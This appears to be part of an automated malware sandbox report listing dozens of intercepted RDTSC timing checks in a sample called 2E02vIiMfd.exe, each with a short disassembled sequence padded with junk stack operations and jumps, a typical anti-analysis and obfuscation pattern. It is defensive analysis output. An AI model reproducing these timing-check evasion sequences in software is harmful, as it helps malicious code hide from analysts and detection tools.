Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7002E second address: C70036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C70036 second address: C70043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F07E8D7A956h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C73457 second address: C7348F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A91h 0x00000007 jmp 00007F07E8CE6A99h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edx 0x00000010 jl 00007F07E8CE6A8Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C786A7 second address: C786AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7883D second address: C78843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C78843 second address: C78847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C78EC2 second address: C78EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C78EC6 second address: C78ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C78ECC second address: C78EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F07E8CE6A9Dh 0x0000000c jmp 00007F07E8CE6A95h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7917C second address: C79180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C79180 second address: C79184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C792E2 second address: C79314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F07E8D7A963h 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F07E8D7A956h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F07E8D7A961h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7E3B4 second address: C7E3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7E3BA second address: C7E3C4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F07E8D7A956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7E3C4 second address: C7E3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F07E8CE6A86h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C45EA7 second address: C45EB1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C461B0 second address: C461C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8CE6A8Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C462CE second address: A8E98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 nop 0x00000007 jmp 00007F07E8D7A95Ah 0x0000000c mov dword ptr [ebp+122D3286h], esi 0x00000012 push dword ptr [ebp+122D173Dh] 0x00000018 sbb edi, 0FFDE41Bh 0x0000001e call dword ptr [ebp+122D2903h] 0x00000024 pushad 0x00000025 jmp 00007F07E8D7A967h 0x0000002a xor eax, eax 0x0000002c jmp 00007F07E8D7A962h 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 mov eax, dword ptr [ebp+122D375Bh] 0x0000003c mov dword ptr [ebp+122D2E26h], edi 0x00000042 popad 0x00000043 mov dword ptr [ebp+122D381Fh], eax 0x00000049 xor dword ptr [ebp+122D2E26h], edx 0x0000004f mov esi, 0000003Ch 0x00000054 mov dword ptr [ebp+122D2E26h], eax 0x0000005a add dword ptr [ebp+122D2E26h], edi 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007F07E8D7A95Eh 0x00000069 lodsw 0x0000006b pushad 0x0000006c mov bh, A6h 0x0000006e popad 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 jc 00007F07E8D7A958h 0x0000007f mov ecx, edx 0x00000081 pushad 0x00000082 jmp 00007F07E8D7A95Bh 0x00000087 mov ebx, dword ptr [ebp+122D36BBh] 0x0000008d popad 0x0000008e popad 0x0000008f nop 0x00000090 pushad 0x00000091 push ecx 0x00000092 push eax 0x00000093 push edx 0x00000094 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4634A second address: C463AD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 00B21FFDh 0x00000012 cld 0x00000013 call 00007F07E8CE6A89h 0x00000018 jmp 00007F07E8CE6A93h 0x0000001d push eax 0x0000001e pushad 0x0000001f jp 00007F07E8CE6A90h 0x00000025 jmp 00007F07E8CE6A95h 0x0000002a popad 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 push edi 0x00000035 pop edi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C464F5 second address: C4652A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F07E8D7A960h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007F07E8D7A95Ch 0x00000012 pop ebx 0x00000013 xchg eax, esi 0x00000014 movsx edx, si 0x00000017 cld 0x00000018 push eax 0x00000019 push edi 0x0000001a pushad 0x0000001b jng 00007F07E8D7A956h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C46B2F second address: C46B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C46E86 second address: C46E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C46E8A second address: C46E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C46E8E second address: C46EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F07E8D7A963h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F07E8D7A964h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C46F74 second address: C46F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F07E8CE6A88h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D7CC second address: C7D7FD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F07E8D7A95Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8D7A961h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F07E8D7A95Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D7FD second address: C7D801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D801 second address: C7D809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D809 second address: C7D823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A94h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D823 second address: C7D827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D987 second address: C7D98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D98C second address: C7D9BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F07E8D7A969h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b jbe 00007F07E8D7A958h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D9BA second address: C7D9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D9BE second address: C7D9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7D9C2 second address: C7D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F07E8CE6A86h 0x0000000d jmp 00007F07E8CE6A8Ch 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F07E8CE6A8Ch 0x0000001a jno 00007F07E8CE6A86h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DB30 second address: C7DB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F07E8D7A956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DC6C second address: C7DC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A97h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DC8D second address: C7DC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DC91 second address: C7DCBF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F07E8CE6A86h 0x00000008 jmp 00007F07E8CE6A95h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F07E8CE6A8Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DCBF second address: C7DCD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F07E8D7A956h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DCD3 second address: C7DCEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C7DE24 second address: C7DE28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8165E second address: C81662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C81662 second address: C81672 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F07E8D7A956h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C85B8B second address: C85B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C854A4 second address: C854AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C854AC second address: C854C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F07E8CE6A95h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C854C9 second address: C854D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C854D9 second address: C854F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A92h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: BFBA77 second address: BFBA9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F07E8D7A967h 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D031 second address: C8D040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D040 second address: C8D05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A967h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D05B second address: C8D05F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D732 second address: C8D77A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F07E8D7A956h 0x00000008 jl 00007F07E8D7A956h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnc 00007F07E8D7A956h 0x00000017 pushad 0x00000018 popad 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F07E8D7A969h 0x00000025 jng 00007F07E8D7A956h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d jnc 00007F07E8D7A956h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D77A second address: C8D796 instructions: 0x00000000 rdtsc 0x00000002 js 00007F07E8CE6A97h 0x00000008 jmp 00007F07E8CE6A91h 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8D8B7 second address: C8D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 je 00007F07E8D7A95Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8E311 second address: C8E317 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C8E317 second address: C8E31D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C91535 second address: C9153A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C90DE9 second address: C90DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C90DEF second address: C90DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C90F84 second address: C90F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C90F8A second address: C90FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F07E8CE6A95h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C90FA7 second address: C90FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9496A second address: C94990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F07E8CE6A94h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94990 second address: C94996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94C47 second address: C94C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94C4B second address: C94C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94C51 second address: C94C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94C5A second address: C94C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C94C60 second address: C94C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F07E8CE6A86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9C29A second address: C9C29F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9CB5E second address: C9CB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F07E8CE6A86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9CB71 second address: C9CB7B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F07E8D7A956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9D430 second address: C9D43C instructions: 0x00000000 rdtsc 0x00000002 je 00007F07E8CE6A86h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9D43C second address: C9D44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F07E8D7A956h 0x0000000a jc 00007F07E8D7A956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9D44C second address: C9D450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9D718 second address: C9D71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9D71C second address: C9D722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DA9C second address: C9DAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A95Ch 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DAB3 second address: C9DAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DAB9 second address: C9DABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DABD second address: C9DAC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DAC3 second address: C9DACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DACC second address: C9DAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DAD5 second address: C9DAD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DAD9 second address: C9DAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DDE1 second address: C9DDF0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F07E8D7A956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C9DDF0 second address: C9DDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
